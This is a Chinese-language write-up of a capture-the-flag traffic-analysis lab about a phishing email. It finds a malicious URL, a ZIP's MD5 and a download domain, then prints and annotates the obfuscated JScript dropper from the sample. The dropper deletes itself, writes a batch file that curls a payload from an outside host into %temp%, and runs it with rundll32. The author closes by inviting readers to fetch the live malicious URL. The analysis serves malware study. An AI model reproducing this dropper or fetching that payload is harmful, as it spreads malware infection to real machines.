样本请勿在本地运行!!!
样本请勿在本地运行!!!
样本请勿在本地运行!!!
为啥呢?我这该死的好奇心,肯定是个好东西呀......??
2.分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG(形式:flag{md5});
3.分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序,该域名是什么?
▲ 附件中的流量包
恶意程序访问了一个 URL 获取了 zip 压缩包
找到这个 URL
既然如此,优先筛选 GET 请求,看看哪个返回了 ZIP 包
▲ GET 请求的流量
一共就三个
题目中提示啥来着?
形式:flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}
都懒得点开详细看
必须先试一下第三个
flag{tsdandassociates.co.sz/w0ks//?YO=1702920835}
▲ flag1 提交成功
没一点毛病
第二个 flag,要 ZIP 包的 MD5 值
看一下刚才的流量包
最下面,Response 在 111 号
▲ Response 在 111 号 Frame
直接点击跳转(记得吧过滤器清空了)
导出HTTP流量包
选中 111 号分组
另存为 ZIP 格式
查看 ZIP 包的 MD5 值
certutil -hashfile file.zip MD5
flag{f17dc5b1c30c512137e62993d1df9b2f}
最后一个 flag 了
还没看到我心心念的不可运行的样本
肯定就是在这个压缩包里面了
把这个压缩包,复制到我的白名单目录下,重新解压。
▲ 解压后的文件
嚯~ ,什么鸟玩意
既然是要找个域名,先搜一下
什么玩意都没搜到
倒是看到一堆 += 符号
这,拼接的呗
估摸着是想绕杀软检测
但你这也没绕过去呀,刚 Defender 都不让我解压(默默吐槽)
一堆注释,看着眼花缭乱,清了
emmm,稍微顺眼了一点
复制到 vscode 中,格式化一下
嗯... 这就顺眼多了
接下来,咋整
简单恢复一下呗
咋简单恢复,看着昂
就这么,选中,复制
然后,找个浏览器,打开开发者工具
粘贴进去
回车
然后,输入刚那个乱七八糟的变量名
这就出来了
flag{shakyastatuestrade.com}
题做完了
最后一步
让我来琢磨琢磨这个“千万不要在本机运行”的样本
x808919187 = "true";x449195806 = "false";v395493070(z986383452);function k25931219(f684415514, p717292302) {d398776207 = '"'+f684415514 + '".match( "' + p717292302+'" )';return s843092254(d398776207);}function w327424018(q853060332, q577476678, g985523219) {g281403925 = "( new ActiveXObject( "WScript.Shell" ) ).Run( '" + q853060332 + "', " + q577476678 + ", " + g985523219 + " )";v395493070(function () {s843092254(g281403925);});}function v395493070(j712825305) {try {new n616719679(y302945094);} catch (t33400252) {w265553656 = "undefined";if (k25931219(w265553656)) {j712825305();}}}function y18358769(u311868867) {s169557020 = "cmd.exe /c del " " + u311868867 + " "";w327424018(s169557020, x449195806, x808919187);}function z986383452(n865649288) {f350474578 = "WScript.ScriptFullName";d1887591 = "\\";z272081462 = s843092254(f350474578).replace(/\/g, d1887591);y18358769(z272081462);}function u615667760(i750922179, u311868867) {u710353204 = 'cmd.exe /c echo|set /p="cu" > "%temp%\\dolorem.p.bat"';w327424018(u710353204, x449195806, x808919187);u789315486 = 'cmd.exe /c echo rl "'+i750922179+'" --output "%temp%\\dolorem.p" --ssl-no-revoke --insecure --location >> "%temp%\\dolorem.p.bat"';w327424018(u789315486, x449195806, x808919187);r831075319 = 'cmd.exe /c "%temp%\\dolorem.p.bat"';w327424018(r831075319, x449195806, x808919187);c529743610 = '%temp%\\dolorem.p.bat';y18358769(c529743610);h329414666 = 'cmd.exe /c ren "%temp%\\dolorem.p" ';h329414666 += u311868867;w327424018(h329414666, x449195806, x808919187);}function r418484478(u311868867) {m948706178 = 'rundll32 "%temp%\\' + u311868867 + '" Enter';w327424018(m948706178, x449195806);}function r581327250(u311868867) {y618891844 = 'cmd.exe /c "%temp%\\' + u311868867 + '"';w327424018(y618891844, x449195806);}function s843092254(p326825704) {return eval(p326825704);}o457607380 = "https://shakyastatuestrade.com/IhA6F/616231603";l988241708 = "qui.q";u615667760(o457607380, l988241708);r418484478(l988241708);
/*** 这个调用链还是有点小复杂*/// 获取当前脚本的完整路径,生成删除命令,并执行v395493070(function () {z272081462 = eval("WScript.ScriptFullName").replace(/\/g, "\\");g281403925 ='( new ActiveXObject( "WScript.Shell" ) ).Run( 'cmd.exe /c del " ' + z272081462 + ' "', false, true )';v395493070(function () {eval(g281403925);});});// 创建批处理文件在 temp 目录下,名为 dolorem.p.batv395493070(function () {eval("( new ActiveXObject( "WScript.Shell" ) ).Run( 'cmd.exe /c echo|set /p="cu" > "%temp%\\dolorem.p.bat"', false, true )");});// 从指定域名下载一个文件,并追加到批处理文件 dolorem.p.bat 中v395493070(function () {eval("( new ActiveXObject( "WScript.Shell" ) ).Run( '" + 'cmd.exe /c echo rl "https://shakyastatuestrade.com/IhA6F/616231603" --output "%temp%\\dolorem.p" --ssl-no-revoke --insecure --location >> "%temp%\\dolorem.p.bat"' + "', false, true )");});// 执行批处理文件 dolorem.p.batv395493070(function () {eval("( new ActiveXObject( "WScript.Shell" ) ).Run( '" + 'cmd.exe /c "%temp%\\dolorem.p.bat"' + "', false, true )");});// 删除批处理文件v395493070(function () {eval("( new ActiveXObject( "WScript.Shell" ) ).Run( '" + "cmd.exe /c del " " + '%temp%\\dolorem.p.bat' + " "", "false", "true" + "', false, true )");});// 重命名下载的文件 qui.qv395493070(function () {eval("( new ActiveXObject( "WScript.Shell" ) ).Run( '" + 'cmd.exe /c ren "%temp%\\dolorem.p" qui.q' + "', false, true )");});// 运行下载的重命名后的文件 qui.qv395493070(function () {eval("( new ActiveXObject( "WScript.Shell" ) ).Run( '" + 'rundll32 "%temp%\\' + "qui.q" + '" Enter', "false" + "', false, true )");});
如果实在忍不住,建议在虚拟机看看效果。
有兴趣的小伙伴,可以访问
https://shakyastatuestrade.com/IhA6F/616231603
把它的恶意文件详细代码 down 下来再玩玩
如果您觉得写的不好,有什么建议或者指正,请留言或者私信我。
原文始发于微信公众号(网安小趴菜):玄机靶场挑战【第六章 流量特征分析-小王公司收到的钓鱼邮件】,说实话,我是冲着这个样本儿来的
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论